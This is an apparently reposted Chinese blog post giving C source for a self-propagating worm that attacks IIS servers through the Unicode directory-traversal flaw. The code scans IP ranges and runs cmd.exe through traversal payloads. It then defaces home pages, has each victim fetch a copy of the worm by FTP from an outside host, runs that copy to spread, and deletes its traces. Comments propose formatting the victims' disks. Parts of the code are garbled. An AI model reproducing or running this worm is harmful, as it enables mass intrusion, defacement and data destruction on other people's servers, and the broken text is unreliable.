掃描UNICODE漏洞傳播、攻擊的蠕蟲原始碼 (轉)
在5.1期間的中美戰中,聯盟的網站中,+IIS+UNICODE主機佔90%。(美國的poizenBOx同樣是利用這個UNICODE漏洞攻擊我國的主機)
詳細請見
下面是我和zhaowuqing寫的一個利用該漏洞的。跟LION蠕蟲有些相象,都需要把自己寄存到某個主機上、、、、、、
執行:直接執行(無引數)將掃描本機IP開始的100個主機,並修改首頁、傳播
帶引數執行 :202.97.233.0 202.97.233.254 這將掃描該IP段的主機並實施攻擊。
下面貼
forget to link with wsock32.lib :-o
#include
#include
義常量
int num=0;
int ExeDirNum=0;
HANDLE hSemaphore=NULL;
MaxThread=100;//最大開100個執行緒掃描
面定義漏洞陣列
char *hole[]={"%c0%2f..%c0%2f..%c0%2f",
"%c0%af..%c0%af..%c0%af",
"%c1%1c..%c1%1c..%c1%1c",
"%c1%9c..%c1%9c..%c1%9c",
"%c0%2f..%c0%2f..%c0%2f",
"%c0%af",
"%c1%9c",
"%c1%pc",
"%c0%9v",
"%c0%qf",
"%c1%8s",
"%c1%1c",
"%c1%9c",
"%c1%af",
"%e0%80%af",
"%f0%80%80%af",
"%f8%80%80%80%af",
"%fc%80%80%80%80%af",
"%e0%80%af../..%e0%80%af../..%e0%80%af",
"%e0%80%af..%e0%80%af..%e0%80%af",
"%c1%1c../..%c1%1c../..%c1%1c",
"%e0%80%af../..%e0%80%af../..%e0%80%af",
"%e0%80%af..%e0%80%af..%e0%80%af","%c1%1c../..%c1%1c../..%c1%1c",
"%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af",
"%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af",
"%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c"};
面7個漏洞出現的目錄,可以自己定義更多,但務必修改後改下面的for迴圈數字
char *ExeDirs[7]={"scripts","msadc","cgi-bin","_vti_bin","_vti_bin/msadc","scripts/msadc","IISADMPWD"};
明
long GetLocalIP(void);//獲得本機IP
D WIN FindExeDir(LPVOID lp);//找到可目錄
char *GetData(int SockFD);//獲取SEND返回的資料
char * find(const char*psz,const char * pszKey);//在返回資料中查詢指定字串
char *localpath;//system32的路徑
char *exedir;//指令碼路徑
char* Path;//首頁所存放的路徑
序入口
int main(int argc, char **argv)
{
HANDLE hThread=NULL;
DWORD dwThreadID;
long Previouunt;
int i;
int Star;
int StopNet;
int StartHost;//IP段開始
int StopHost;//IP段結束
WSADATA wsaData;
struct in_addr host;
Wtartup(0x202, &wsaData );
if(argc<2)//無引數執行的時候掃描本機IP開始的100個主機
{
StartNet=GetLocalIP();
StopNet=GetLocalIP()+100;
}
else//引數iis 202.97.56.3 202.97.56.254這種方式,取引數作為IP段
{
StartNet=inet_addr(argv[1]);
StopNet=inet_addr(argv[2]);
}
StartHost=ntohl(StartNet);
StopHost=ntohl(StopNet);
WSACleanup();
do
{
host.S_un.S_addr =_addr(argv[1]);
WSAStartup(0x202, &wsaData );
hSemaphore=CreateSemaphore(NULL,MaxThread,MaxThread,NULL);
if(hSemaphore==NULL)
{
printf("nCreateSemaphore failed:%d",GetLastError());
;
}
for(i=StartHost;i<=StopHost;i++)
{
hThread=CreateThread(NULL,0,FindExeDir,(LPVOID)i,0,&dwThreadID);
if(hThread==NULL)
{
printf("nCreate thread failed:%d",GetLastError());
break;
}
printf(".");
Sleep(10);
CloseHandle(hThread);
WaitForSingle(hSemaphore,INFINITE);
}
while(1)
{
WaitForSingleObject(hSemaphore,INFINITE);
if(!ReleaseSemaphore(hSemaphore,1,&PreviousCount))
{
printf("nmain() ReleaseSemaphore failed:%d",GetLastError());
Sleep(5000);
break;
}
if(PreviousCount==(MaxThread-1))
{
printf("nAll done.");
break;
}
Sleep(500);
}
printf("發現可執行目錄. [%s]n", exedir);
printf("可執行目錄是 [%s]n",localpath);
CloseHandle(hSemaphore);
WSACleanup();
}
while(argc<2);//無引數執行,既在被黑主機上執行,死迴圈
return 0;
}
long GetLocalIP(void)
{
char szName[128];
int i;
PHOSTENT pHost;
gethostname(szName, 128);
printf("%sn",szName);
pHost = gethostbyname(szName);
if( NULL == pHost )// failed
return 0;
for(i=0;pHost->h_addr_list[i]!=NULL;i++)
printf("%sn",inet_ntoa(*((struct in_addr *)pHost->h_addr_list[i])));
return inet_addr(inet_ntoa(*((struct in_addr *)pHost->h_addr_list[i-1])));
}
DWORD WINAPI FindExeDir(LPVOID lp)
{
int host=(int)lp;
u_short port=80;
int SockFD,i;
struct sockaddr_in DstSAin;
char waste[500],uniwaste[500];
char *buffer,*p;
char space[3];
char dletter[2];//路徑
char asc[3];
int rbytes=0,loc1=0,loc2=0;
char locdir[300];
int exenum=0;
:
memset(locdir,0,300);
memset(uniwaste,0,499);
memset(space,0,3);
strcpy(space,"%20");
memset(asc,0,3);
strcpy(asc,"%3E");
printf("查詢漏洞%d...n",host);
for(i=0;i<8;i++)
{
strcat(uniwaste,"..");
strcat(uniwaste,hole[num]); unicode碼和URL結合起來.
}
memset(waste,0,500);
our string that sees if we can execute cmd.exe
way we know if a directory is executable and if the exe dir is on the same harddrive as cmd.exe
sprintf(waste,"GET /%s/%s/winnt/system32/cmd.exe?/c%sdir HTTP/1.0nn",ExeDirs[exenum],uniwaste,space);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("Trying directory [%s]n", waste);
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Directory of"); 到了cmd.exe的目錄!!!
if(p!=NULL)
{
loc1=p-buffer+1;
p=strstr(buffer,"
if(p!=NULL)
{
loc2=p-buffer+1;
loc2=loc2-27;
buffer[loc2-2]='';
strncpy(locdir,buffer+loc1+12,290);
executable directory.
exedir=malloc(strlen(ExeDirs[exenum])+1);
memset(exedir,0,strlen(ExeDirs[exenum])+1);
memcpy(exedir,ExeDirs[exenum],strlen(ExeDirs[exenum]));
executable directory path
localpath=malloc(strlen(locdir)+1);
memset(localpath,0,strlen(locdir)+1);
memcpy(localpath,locdir,strlen(locdir));
closesocket(SockFD);
詢首頁位置
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd.exe?/c%sset HTTP/1.0nn",ExeDirs[exenum],uniwaste,space);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
WebPath=find(buffer,"PATH_TRANSLATED=");//上面透過cmd.exe?/c set命令顯示主機
中找到WEB目錄,用來修改首頁
closesocket(SockFD);
strncpy(dletter,localpath,1);
dletter[1]='';
printf("首頁路徑%sn",WebPath);
}
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+啞啞呀啞啞呀啞啞呀啞啞呀default.>+%sdefault.asp HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,WebPath);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("修改首頁default.asp n");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
printf("Access is denied");
}
closesocket(SockFD);
}
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+啞啞呀啞啞呀啞啞呀啞啞呀index.asp>+%sindex.asp HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,WebPath);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("修改首頁index.asp n");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
printf("不能修改,屬性有問題");
}
closesocket(SockFD);
}
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+啞啞呀啞啞呀啞啞呀啞啞呀index.html>+%sindex.html HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,WebPath);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("修改首頁index.html n");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p=NULL)
{
printf("不能修改,檔案屬性有問題");
}
closesocket(SockFD);
}
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+啞啞呀啞啞呀啞啞呀啞啞呀和~~~default.htm>+%sdefault.htm HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,WebPath);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("修改首頁default.htm n");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
printf("不能修改,檔案屬性有問題");
}
closesocket(SockFD);
}
接到FTP主機
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+open+home4u.china.com>+%s:winntsystem32up.txt HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,dletter);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("連線到FTP主機 n");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
printf("system32不允許寫操作");
}
closesocket(SockFD);
}
登陸
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+111222>>+%s:winntsystem32up.txt HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,dletter);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("登陸USER:111222n");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
printf("system32不允許寫操作");
}
closesocket(SockFD);
}
碼輸入
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+mmipip>>+%s:winntsystem32up.txt HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,dletter);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("密碼:mmipn");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
printf("system32不允許寫操作");
}
closesocket(SockFD);
}
FILE
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+get+srv.exe>>+%s:winntsystem32up.txt HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,dletter);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("srv.exe n");//把自己下載到漏洞主機執行
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
printf("system32不允許寫操作");
}
closesocket(SockFD);
}
出ftp主機
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+quit>>+%s:winntsystem32up.txt HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,dletter);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("退出FTP主機 n");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
printf("system32不允許寫操作");
}
closesocket(SockFD);
}
始FTP
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%tp+-s:up.txt>>+%s:winntsystem32up.txt HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,dletter);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("下載檔案 n");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Error");
if(p!=NULL)
{
printf("FTP結束");
}
closesocket(SockFD);
}
除del.txt避免在主機上留有FTP資訊
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%sdel+%s:winntsystem32up.txt HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,dletter);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("刪除FTP痕跡 n");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"access is");
if(p!=NULL)
{
printf("刪除失敗");
}
closesocket(SockFD);
}
行
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%ssrv.exe HTTP/1.0nn",ExeDirs[exenum],uniwaste);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("在主機上執行自己 n");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"CGI Error");
if(p!=NULL)
{
printf("執行成功");//此時存在漏洞的主機開始掃描自己IP段附近的漏洞主機
}
closesocket(SockFD);
}
1;
}
}
if(num<23)//迴圈嘗試漏洞編碼
{ num++;
closesocket(SockFD);
goto crack;
}
else
{
if(exenum<6)//遍歷各個目錄
{
num=0;
exenum++;
ExeDirNum=exenum;
closesocket(SockFD);
goto crack;
}
closesocket(SockFD);
}
printf("掃描全部結束,在此應該進行破壞性操作...n");
選辦法,在目標主機上的autoexec.bat里加上格式化命令
後執行ExitSystem(1);使主機重新啟動
新啟動後格式化硬碟
}
return 0;
}
返回的資料中查詢指定資訊
char* find(const char*pszSource,const char* pszKey)
{
static char szBuffer[2049];
const char * p;
const char * q;
p = q = NULL;
p = strstr(pszSource,pszKey);
if ( p != NULL )
{
p += strlen(pszKey);
q = strstr(p,"rn");
if ( q == NULL )
q = p + strlen(p);
strncpy(szBuffer,p,q-p);
return szBuffer;
}
return NULL;
}
char *GetData(int SockFD)
{
data without a blocking recv so we dont hang if we crash the server
char *buffer;
char data[2001];
unsigned long on=1;
unsigned long off=0;
char waste[2001];
int p, i=1;
int t;
memset(data,0,2001);
p=ioctlsocket(SockFD,FIONBIO,&on);
memset(waste,0,2001);
for(t=1;t<10;t++){
i=recv(SockFD, waste, 2000, 0);
if(i>0)
break;
Sleep(500);
}
waste[i]='';
strncat(data,waste,2000);
buffer = ( char * )malloc( 2000 * sizeof( char ) );
strncpy( buffer, data, 2000 );
return buffer;
}
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/10752043/viewspace-995566/,如需轉載,請註明出處,否則將追究法律責任。
相關文章
- SQL隱碼攻擊式攻擊掃描器SQL
- 自動化LFI漏洞掃描攻擊之LFI SuiteUI
- Joomla漏洞每天受到黑客16600次掃描攻擊OOM黑客
- 為什麼漏洞掃描程式不足以防止勒索軟體攻擊
- 非掃描式定位攻擊域內SQL ServerSQLServer
- AWVS掃描器掃描web漏洞操作Web
- Python-FTP漏洞掃描指令碼PythonFTP指令碼
- 一個用c#寫的掃描asp原始碼漏洞的應用程式C#原始碼
- Windows 使用者介面有缺陷 攻擊程式碼在網上傳播(轉)Windows
- 自制分散式漏洞掃描分散式
- 卡巴斯基發現攻擊社交網站的Koobface蠕蟲近期活動激增網站
- DAST 黑盒漏洞掃描器 第四篇:掃描效能AST
- (轉)Discuz!X2.0SQL隱碼攻擊漏洞EXPSQL
- 安全專家發現Linux蠕蟲 涉及兩處漏洞(轉)Linux
- DAST 黑盒漏洞掃描器 第五篇:漏洞掃描引擎與服務能力AST
- Rust 程式碼質量和漏洞掃描工具 - RedditRust
- “魔獸”玩家小心啦! Lucky蠕蟲病毒利用魔獸地圖大肆傳播地圖
- 網站漏洞掃描工具Uniscan網站
- 系統漏洞掃描工具Nessus
- WordPress漏洞掃描工具WPScan
- Web漏洞掃描篇-Nessus使用Web
- ROVNIX攻擊平臺分析 -利用WordPress平臺傳播的多外掛攻擊平臺
- Rad爬蟲結合W13Scan掃描器挖掘漏洞爬蟲
- 原始碼掃描裝置/軟體列表原始碼
- html5+的plus 監聽掃描槍廣播 處理掃描結果HTML
- Nessus漏洞掃描教程之使用Nmap工具掃描識別指紋
- 多個黑產團伙利用向日葵遠控軟體RCE漏洞攻擊傳播
- Pythonpyclamad病毒掃描與目錄病毒掃描指令碼(轉載)Python指令碼
- Rails 3爆SQL隱碼攻擊漏洞AISQL
- Android漏洞掃描工具Code ArbiterAndroid
- 漏洞掃描軟體Nessus使用教程
- 【網路安全】什麼是SQL隱碼攻擊漏洞?SQL隱碼攻擊的特點!SQL
- WEB安全漏洞掃描與處理(上)——安全漏洞掃描工具AppScan的安裝使用WebAPP
- pl/sql原始碼掃描sql(10g)SQL原始碼
- 全球再迎超級颶風,黑客可利用微軟“蠕蟲級”高危漏洞暴擊全球黑客微軟
- 網站上傳漏洞掃描與檢測 以及webshell解決辦法網站Webshell
- 分析一個linux下的蠕蟲 (轉)Linux
- 清除Linux上的蠕蟲程式Ramen(轉)Linux